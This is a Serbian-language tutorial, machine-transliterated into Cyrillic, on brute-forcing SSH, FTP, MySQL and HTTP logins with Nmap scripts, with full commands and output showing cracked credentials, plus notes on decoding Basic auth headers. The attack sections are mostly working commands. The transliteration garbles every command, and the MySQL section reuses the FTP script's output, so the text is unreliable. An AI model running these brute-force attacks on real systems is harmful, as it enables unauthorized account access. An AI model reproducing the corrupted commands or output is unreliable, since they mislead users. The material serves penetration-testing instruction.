Нмап

Форсирање грубе лозинке помоћу Нмап-а

Форсирање грубе лозинке помоћу Нмап-а
Да би извршили грубу силу на мрежи, људи обично користе Хидра, Медуса и Метасплоит Фрамеворк, али Нмап се такође може користити за грубу силу многих мрежних услуга. Постоје уграђене Нмап скрипте које подржавају ФТП, МиСКЛ, СМТП, СНМП, ССХ, Телнет, ЛДАП и друге разне услуге. Такође можете грубо форсирати ХТТП засноване на основним и основним методама потврде идентитета. Ако имате инсталиран Нмап, ове скрипте можете видети у директоријуму „/ уср / схаре / нмап / сцриптс“.

[заштићена е-поштом]: ~ $ судо апт упдате && судо апт надоградња
[заштићен е-поштом]: ~ $ судо апт инсталл нмап -и
[заштићена е-поштом]: ~ $ цд / уср / схаре / нмап / сцриптс /
[заштићен е-поштом]: ~ $ лс * бруте *

У овом упутству ћемо истражити како можемо користити Нмап за грубу силу.

ССХ Бруте Форце

ССХ је сигуран протокол за даљинску администрацију и подржава аутентификацију засновану на опенссл-у и лозинки. За грубу силу ССХ аутентификације засновану на лозинци можемо користити „ссх-бруте.нсе ”Нмап скрипта.

убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * ссх * бруте *
ссх-бруте.нсе

Проследи листу корисничких имена и лозинки као аргумент Нмап-у.

[заштићена е-поштом]: ~ $ нмап --сцрипт ссх-бруте -п22 192.168.43.181
--сцрипт-аргс усердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 17:09 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00033с).
ЛУЧКА ДРЖАВНА УСЛУГА
22 / тцп отворено ссх
|. | ссх-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 60 секунди, просечно тпс: 1.7
Нмап готово: 1 ИП адреса (1 хост уп) скенирана у 60.17 секунди

ФТП груба сила

ФТП је протокол за пренос датотека који подржава аутентификацију засновану на лозинци. За грубу силу ФТП-а користићемо „фтп-бруте.нсе ”Нмап скрипта.

убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * фтп * бруте *
фтп-бруте.нсе

Проследи листу корисничких имена и лозинки као аргумент Нмап-у.

[заштићена е-поштом]: ~ $ нмап --сцрипт фтп-бруте -п21 192.168.43.181 --сцрипт-аргс
усердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 16:51 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00021с).
ЛУЧКА ДРЖАВНА УСЛУГА
21 / тцп отворен фтп
|. | фтп-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 20 секунди, просечно тпс: 5.0
Нмап готово: 1 ИП адреса (1 хост уп) скенирана за 19.50 секунди

МИСКЛ Бруте-Форце

Понекад МиСКЛ остаје отворен за спољне везе и омогућава било коме да се повеже са њим. Његова лозинка се може разбити помоћу Нмап-а са скриптом „мискл-бруте“.

[заштићена е-поштом]: ~ $ судо нмап --сцрипт мискл-бруте -п3306 192.168.43.181
--сцрипт-аргс усердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 16:51 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00021с).
ЛУЧКА ДРЖАВНА УСЛУГА
3306 / тцп отворен мискл
|. | фтп-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 20 секунди, просечно тпс: 5.0
Нмап готово: 1 ИП адреса (1 хост уп) скенирана за 19.40 секунди

ХТТП груба сила

ХТТП користи три врсте потврде идентитета за потврду идентитета корисника на веб серверима. Ове методологије се користе у рутерима, модемима и напредним веб апликацијама за размену корисничких имена и лозинки. То су:

Основна аутентификација

У основном ХТТП протоколу за аутентификацију, прегледач кодира корисничко име и лозинку са басе64 и шаље их под заглављем „Ауторизација“. То можете видети на следећем снимку екрана.

Овлашћење: Основни ИВРтаВ46ИВРтаВ4 =

Можете басе64 декодирати овај низ да бисте видели корисничко име и лозинку

[заштићена е-поштом]: ~ $ ецхо ИВРтаВ46ИВРтаВ4 = | басе64 -д
админ: админ

Основна ХТТП потврда идентитета није сигурна јер шаље и корисничко име и лозинку у обичном тексту. Било који нападач Ман-ин-тхе-Миддле може лако пресрести саобраћај и декодирати низ да би добио лозинку.

Дигест Аутхентицатион

ХТТП Дигест аутентификација користи технике хеширања за шифровање корисничког имена и лозинке пре него што их пошаље на сервер.

Хасх1 = МД5 (корисничко име: царство: лозинка)
Хасх2 = МД5 (метода: дигестУРИ)
одговор = МД5 (Хасх1: нонце: нонцеЦоунт: цнонце: коп: Хасх2)

Ове вредности можете видети под заглављем „Овлашћење“.

Потврда идентитета на основу дигеста је сигурна јер лозинка није послата у обичном тексту. Ако нападач Ман-ин-тхе-Миддле пресретне саобраћај, неће моћи добити лозинку за обичан текст.

Аутентификација на основу обрасца

Басиц и Дигест аутентификација подржавају само пренос корисничког имена и лозинке, док се аутентификација заснована на обрасцу може прилагодити на основу потреба корисника. Можете да направите сопствену веб страницу у ХТМЛ-у или ЈаваСцрипт-у да бисте применили сопствене технике кодирања и преноса.

Обично се подаци у обрасцу за потврду идентитета шаљу у обичном тексту. Због безбедносних проблема морају се применити ХТТП-ови како би се спречили напади „Човек у средини“.

Можемо грубо наметнути све врсте ХТТП аутентификације помоћу Нмап-а. У ту сврху ћемо користити скрипту „хттп-бруте“.

убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * хттп * бруте *
хттп-бруте.нсе

Да бисмо тестирали ову Нмап скрипту, решићемо јавно хостирани изазов бруте силе Пентестер академије на овом УРЛ-у хттп: // пентестерацадемилаб.аппспот.цом / лаб / вебапп / басицаутх.

Као аргумент скрипте морамо одвојено навести све, укључујући име хоста, УРИ, метод захтева и речнике.

[заштићена е-поштом]: ~ $ судо нмап -п80 --сцрипт хттп-бруте пентестерацадемилаб.аппспот.цом
--сцрипт-аргс хттп-бруте.име хоста = пентестерацадемилаб.аппспот.цом,
хттп-бруте.патх = / лаб / вебапп / басицаутх, усердб = усерс.ткт, пассдб = лозинке.ткт,
хттп-бруте.метода = ПОСТ
 
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 21:37 ПКТ
Извештај о скенирању Нмап за пентестерацадемилаб.аппспот.цом (216.58.210.84)
Домаћин је подигнут (0.Кашњење од 20с).
Остале адресе за пентестерацадемилаб.аппспот.цом (није скенирано): 2а00: 1450: 4018: 803 :: 2014
рДНС запис за 216.58.210.84: мцт01с06-у-ф84.1е100.нето
 
ЛУЧКА ДРЖАВНА УСЛУГА
80 / тцп отвори хттп
|. | хттп-бруте:
|. | Рачуни:
|. | админ: ааддд - Важећи акредитиви
| _ Статистика: Изведено 165 нагађања за 29 секунди, просечно тпс: 5.3
Нмап готово: 1 ИП адреса (1 хост уп) скенирана у 31.22 секунде

Закључак

Нмап се може користити за многе ствари упркос једноставном скенирању порта. Може да замени Метасплоит, Хидра, Медуса и мноштво других алата направљених специјално за форсирање брута на мрежи. Нмап има уграђене скрипте једноставне за употребу које грубо форсирају готово све услуге, укључујући ХТТП, ТЕЛНЕЛ, ССХ, МиСКЛ, Самба и друге.

Игре Вулкан за кориснике Линука
Вулкан за кориснике Линука
Са сваком новом генерацијом графичких картица видимо да програмери игара помичу границе графичке верности и долазе на корак од фотореализма. Али упрко...
Игре ОпенТТД вс Симутранс
ОпенТТД вс Симутранс
Стварање сопствене симулације превоза може бити забавно, опуштајуће и изузетно примамљиво. Због тога морате да испробате што више игара како бисте про...
Игре Водич за ОпенТТД
Водич за ОпенТТД
ОпенТТД је једна од најпопуларнијих игара за пословну симулацију. У овој игри морате створити диван посао превоза. Међутим, почет ћете у почетку око 1...